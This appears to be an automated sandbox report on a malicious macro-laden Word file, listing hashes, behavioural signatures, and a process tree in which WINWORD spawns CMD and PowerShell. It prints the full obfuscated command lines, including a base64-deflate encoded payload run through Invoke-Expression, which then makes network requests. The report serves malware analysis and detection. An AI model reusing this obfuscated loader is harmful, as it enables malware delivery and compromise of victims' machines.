Analysis

Max time kernel: 119s
Max time network: 120s
Platform: windows7_x64
Resource: win7-20240903-en
Resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
Submitted: 15-09-2024 21:32
Behavioral task: behavioral1
Sample: e36605b4d8b6e37b33ef0228bee7c764_JaffaCakes118.doc
Resource: win7-20240903-en

Behavioral task: behavioral2
Sample: e36605b4d8b6e37b33ef0228bee7c764_JaffaCakes118.doc
Resource: win10v2004-20240802-en
General

Target: e36605b4d8b6e37b33ef0228bee7c764_JaffaCakes118.doc
Size: 78KB
MD5: e36605b4d8b6e37b33ef0228bee7c764
SHA1: 36aa582a3a4d540d1c1335fd5cc9a37af8d65010
SHA256: 788f2664d8d90cc23b7b0f987112fdd80c54de4ba9566a5714392b7fe0208fe9
SHA512: 5cd157b31e7fab60f52f8b23bcfff37b2715a2c0916f6b76c732c094b8e040b5bf92b423e3c98e0086062711fb82dd61d03378aea181947c76379bb78f88dc1d
SSDEEP: 768:Q/ZVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9KTwiRZ1u2O7VQnoH:EZocn1kp59gxBK85fBt+a9KNRvi
Malware Config
Signatures
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description | pid | pid_target | process | target process
  Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 3004 | 1732 | CMD.exe | WINWORD.EXE
Blocklisted process makes network request (6 IoCs)
Processes:
  flow | pid | process
  7 | 2312 | powershell.exe
  9 | 2312 | powershell.exe
  11 | 2312 | powershell.exe
  13 | 2312 | powershell.exe
  15 | 2312 | powershell.exe
  16 | 2312 | powershell.exe
Drops file in Windows directory (1 IoC)
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WINWORD.EXE
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | CMD.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
  pid | process
  1732 | WINWORD.EXE
Suspicious behavior: EnumeratesProcesses (1 IoC)
Processes:
  pid | process
  2312 | powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 2312 | powershell.exe
Suspicious use of SetWindowsHookEx (2 IoCs)
Processes:
  pid | process
  1732 | WINWORD.EXE
  1732 | WINWORD.EXE
Suspicious use of WriteProcessMemory (12 IoCs)
Processes:
  description | pid | process | target process
  PID 1732 wrote to memory of 3060 | 1732 | WINWORD.EXE | splwow64.exe (4 occurrences)
  PID 1732 wrote to memory of 3004 | 1732 | WINWORD.EXE | CMD.exe (4 occurrences)
  PID 3004 wrote to memory of 2312 | 3004 | CMD.exe | powershell.exe (4 occurrences)
Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (PID 1732, depth 1)
Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e36605b4d8b6e37b33ef0228bee7c764_JaffaCakes118.doc"
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory

  C:\Windows\splwow64.exe (PID 3060, depth 2, child of 1732)
  Command line: C:\Windows\splwow64.exe 12288

  C:\Windows\SysWOW64\CMD.exe (PID 3004, depth 2, child of 1732)
  Command line: CMD C:\WINDowS\systEm32\CMD.exE /C "set kidZ= . ( $sHellid[1]+$SHELlID[13]+'X')(new-oBject sySTEM.IO.comPRESSiON.deFLatesTreaM( [IO.MeMOrYStReAM][CONVERT]::fRoMbASE64stRINg('NZBBawIxEIX/yh4CUazJzWrDgqViEVEPFraFXrJxiqnZSZqdNWvF/95V6vV9bz6Yx5azTY6Qhr78BkPZGkgUUL44C0iKbdfPOd8ThScpbWiM07XxzqKuhfGVHLej7bxNj9P/Sh2aGKKv/I2WE/hYFKs7TCmJGkwE0tFqaAmwth5FgyRg1wgdZQpD47EDJMvl/Y7AuRPp3UELBJJJb/Tb7PdOwflK1I08crENzlKPT3lfsR8sszzjo/GEK/b6XuQM8PhEUIUB/+SDKx9wAS1w9eUjaLPvsaJZZRaz69P9M8XTmXXjiJlP6Lzeza2DW+chuwr7aoFHf4DhopPeElV2noO6GE1mf75c/gA='), [syStEM.io.cOmprEsSIoN.compRESsiONMODe]::dECOMpREsS ) ^|% {new-oBject iO.STrEamREADEr($_,[sYStEM.TexT.eNCoDinG]::AsCII)}).ReaDTOENd( ) && powErShelL ${7`4k} =[tYpE]( \"{0}{2}{1}\" -F'E','NMeNT','NvIro' ) ; ${eX`eCuTI`oNCoNt`EXt}.\"In`VoKEc`OmM`AnD\".(\"{1}{0}{2}\"-f'kEscr','iNVo','ipT').Invoke(( ${7`4K}::( \"{0}{2}{3}{4}{1}\" -f'geTeN','BLE','v','iROnmE','ntVaRIa' ).Invoke( (\"{0}{1}\" -f 'k','Idz'),( \"{1}{0}\"-f'Ss','PRoce' )) ) )"
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2312, depth 3, child of 3004)
    Command line: powErShelL ${7`4k} =[tYpE]( \"{0}{2}{1}\" -F'E','NMeNT','NvIro' ) ; ${eX`eCuTI`oNCoNt`EXt}.\"In`VoKEc`OmM`AnD\".(\"{1}{0}{2}\"-f'kEscr','iNVo','ipT').Invoke(( ${7`4K}::( \"{0}{2}{3}{4}{1}\" -f'geTeN','BLE','v','iROnmE','ntVaRIa' ).Invoke( (\"{0}{1}\" -f 'k','Idz'),( \"{1}{0}\"-f'Ss','PRoce' )) ) )
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 19KB
MD5: c555b8f0042d9b6a880e56e54508ece0
SHA1: d49077620311b19f005309908761b06cc6c366ab
SHA256: a62219932049d8df16e7ef03a4d33bb03b9be910ff2eef9ac71dd2e0ad93ae14
SHA512: 026eb8d409cc6f0e02453c08d9ca144fc74831230f75daa73f4538cabd8c52d939c829c45276e5950bb385d3f0758edbfbdaeb813c330c157a2accf032e29df0